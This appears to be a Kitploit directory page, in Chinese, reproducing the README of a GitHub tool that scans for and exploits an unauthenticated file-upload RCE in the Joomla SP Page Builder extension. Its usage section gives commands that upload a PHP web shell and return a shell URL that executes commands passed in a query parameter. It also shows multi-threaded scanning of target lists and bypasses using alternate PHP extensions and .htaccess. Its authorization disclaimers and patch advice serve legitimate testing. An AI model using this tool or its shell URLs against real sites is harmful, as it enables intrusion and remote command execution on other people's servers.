Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-48908-by-yora — 影响 SP Page Builder 的 CVE-2026-48908 被动安全检测器 | Kitploit
工具/GitHubGitHub/yora1928/cve-2026-48908-by-yora
侦察漏洞扫描器Web漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试红队
GitHubyora1928/cve-2026-48908-by-yora

CVE-2026-48908-by-yora

28天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

影响 SP Page Builder 的 CVE-2026-48908 被动安全检测器

查看仓库

🔐 CVE-2026-48908 扫描器 + PoC(安全利用)

[ Joomla SP Page Builder — 未认证 RCE ]

Python License Joomla

由 yora 开发


📌 关于本项目

本项目是一个 安全研究工具,由 yora 开发,用于检测并验证 Joomla 的 SP Page Builder 扩展中的 CVE-2026-48908 漏洞。

该漏洞允许攻击者 在无需认证 的情况下,通过 asset.uploadCustomIcon 端点上传 PHP 文件,随后该文件会被解压到公共目录并可被执行 → 远程代码执行(RCE)。

受影响版本:SP Page Builder 1.0.0 至 6.6.1(在 6.6.2 中修复)。

⚠️ 警告 – 仅可用于 您拥有 或 您已获得书面授权 的系统。未经授权的使用属于 违法行为。


👨‍💻 开发者

本项目由以下人员开发与维护:

  • yora — GitHub • Twitter

由安全社区与独立研究人员支持。


✨ 主要功能


🚀 安装

克隆仓库

root@kitploit:~
git clone https://github.com/yora1928/CVE-2026-48908-by-yora.git
cd CVE-2026-48908-by-yora

安装依赖

root@kitploit:~
python -m pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0

📖 使用指南

1️⃣ 仅检测(不利用)

root@kitploit:~
python scanner.py --url https://target-website.com

示例输出:

root@kitploit:~
[🔴 CONFIRMED] https://target-website.com
    ├─ SP detected
    ├─ v6.3.1
    └─ Vulnerable version 6.3.1 and endpoint open

2️⃣ 检测 + RCE 证明(安全利用)

root@kitploit:~
python scanner.py --url https://target-website.com --exploit

过程说明:

  • 工具检测易受攻击的版本。
  • 上传包含秘密 token 的 PHP 文件。
  • 尝试访问该文件以确认执行。
  • 如果成功,则显示可直接使用的 Shell URL。

成功输出示例(来自真实测试):

root@kitploit:~
[*] Scanning: https://target-website.com
[*] Target confirmed vulnerable. Running adaptive exploit...
[*] Trying method: php                 -> EXECUTED
[🔴 CONFIRMED] https://target-website.com
    ├─ SP detected
    ├─ v6.3.1
    └─ Vulnerable version 6.3.1 and endpoint open
    └─ ✅ RCE confirmed via PoC upload!
         Shell URL: https://target-website.com/media/com_sppagebuilder/assets/iconfont/icoyjdehd/fonts/fpqofpk.php?t=7f5e90gcxx0j0r51&c=<cmd>
         Created dirs: media/com_sppagebuilder/assets/iconfont/icoyjdehd

如何使用 Shell URL:

  • 通过参数 c 传入要执行的命令来访问 URL。
  • 示例:...?t=7f5e90gcxx0j0r51&c=whoami
  • 命令输出将显示在页面上。

🔐 Token(t=...)是机密信息 – 请勿将 shell URL 分享给未经授权的人员。


3️⃣ 从文件扫描多个目标

创建 targets.txt 文件(每行一个 URL):

root@kitploit:~
https://site1.com
https://site2.com

运行:

root@kitploit:~
python scanner.py --list targets.txt --threads 5

带利用:

root@kitploit:~
python scanner.py --list targets.txt --threads 5 --exploit

4️⃣ 将结果保存为 JSON 文件

root@kitploit:~
python scanner.py --url https://target.com --output reports/hasil.json

5️⃣ 清理(删除工件)

完成后,清理所创建的目录:

root@kitploit:~
python scanner.py --url https://target.com --exploit --cleanup

注意:--cleanup 会显示需要手动执行的 rm -rf 命令(因为写入权限可能受限)。如果您有 FTP/SSH 访问权限,请删除 Created dirs 中列出的目录。


📊 分类结果解读


📁 JSON 报告示例

scan_result.json 文件包含所有收集到的证据:

root@kitploit:~
{
  "scanner": "CVE-2026-48908 Scanner + Exploit",
  "scan_time": "2026-08-13T10:30:00.123456+00:00",
  "total_targets": 1,
  "results": [
    {
      "target": "https://target.com",
      "classification": {
        "status": "CONFIRMED",
        "confidence": "high",
        "reasoning": ["Vulnerable version 6.3.1 and endpoint open"],
        "evidence_summary": ["SP asset at /components/..."]
      },
      "exploit_result": {
        "upload_success": true,
        "access_success": true,
        "shell_url": "https://target.com/media/.../fpqofpk.php?t=TOKEN&c=<cmd>",
        "created_dirs": ["media/com_sppagebuilder/assets/iconfont/icoyjdehd"]
      }
    }
  ]
}

📁 项目结构

root@kitploit:~
CVE-2026-48908-by-yora/
├── scanner.py          # File utama (deteksi + exploit)
├── requirements.txt    # Dependensi Python
├── README.md           # Dokumentasi ini
├── SECURITY.md         # Kebijakan keamanan dan pelaporan
├── LICENSE             # Lisensi MIT
├── detection/          # (opsional) modul deteksi tambahan
├── poc/                # (opsional) PoC alternatif
└── reports/            # Tempat menyimpan hasil JSON (otomatis)

🔒 道德与责任

  • 仅可对您拥有或已获得书面授权的系统使用此工具。
  • 不得用于:
    • 对互联网进行随机扫描。
    • 收集易受攻击的目标以便攻击。
    • 非法访问他人的系统。
  • 使用完毕后,删除所有工件(已上传的文件和目录)。
  • 作者(yora)不对该工具的滥用承担任何责任。

使用此工具即表示您同意对自身行为承担全部责任。


📬 贡献与报告

如果您发现问题或有兴趣贡献,请在本仓库中提交 Issue 或 Pull Request。

安全报告请遵循 SECURITY.md 中的指南。


📜 许可

本项目基于 MIT License 许可 – 详情请参见 LICENSE 文件。


🙏 致谢

  • CVE 发现:CERT Vanuatu、Censys、Check Point
  • PoC 研究与实现:yora 及安全社区。

由 yora 用 ❤️ 开发

下载工具
功能说明
🔍 组件检测从多种来源(robots.txt、administrator、asset、HTML)检测 Joomla 和 SP Page Builder。
📌 版本指纹识别通过 CSS/JS、meta 标签和 manifest 文件识别 SP Page Builder 版本。
🧪 端点验证在无需认证的情况下测试 asset.uploadCustomIcon 的可访问性。
📊 智能分类将结果分类为 CONFIRMED / LIKELY / NOT_VULNERABLE / UNKNOWN,并附有原因和置信度。
🚀 自适应利用如果使用 --exploit,工具会尝试多种 PHP 扩展名(.php、.php3、.phtml、.PHP 等)和 .htaccess 来安全地证明 RCE。
📁 JSON 输出所有证据均保存到 .json 文件中,便于审计和报告。
⚡ 多线程通过 --list 和线程设置同时扫描多个目标。
🧹 清理--cleanup 显示用于删除已上传工件的命令。
状态含义建议操作
🔴 CONFIRMED检测到 SP Page Builder,版本存在漏洞(≤ 6.6.1),且 asset.uploadCustomIcon 端点无需认证即可访问。存在漏洞。立即将 SP Page Builder 更新到 6.6.2 或更高版本。如果已使用 --exploit,请删除已上传的工件。
🟡 LIKELY检测到 SP,版本存在漏洞,但端点认证状态尚无法确定。很可能存在漏洞。手动验证:在不登录的情况下访问 index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon 端点。如果未跳转到登录页,则存在漏洞。
🟢 NOT_VULNERABLE检测到 SP Page Builder 版本 ≥ 6.6.2(已修复)。安全。无需进一步操作。
⚪ UNKNOWN未检测到 SP Page Builder,或无法识别版本,或数据不足。手动检查是否安装了 SP Page Builder。如果是,请尝试通过 /administrator/components/com_sppagebuilder/ 中的 sppagebuilder.xml 文件检测版本。
❌ ERROR发生连接错误或超时。检查互联网连接、防火墙,或尝试使用 --timeout 60 延长超时时间。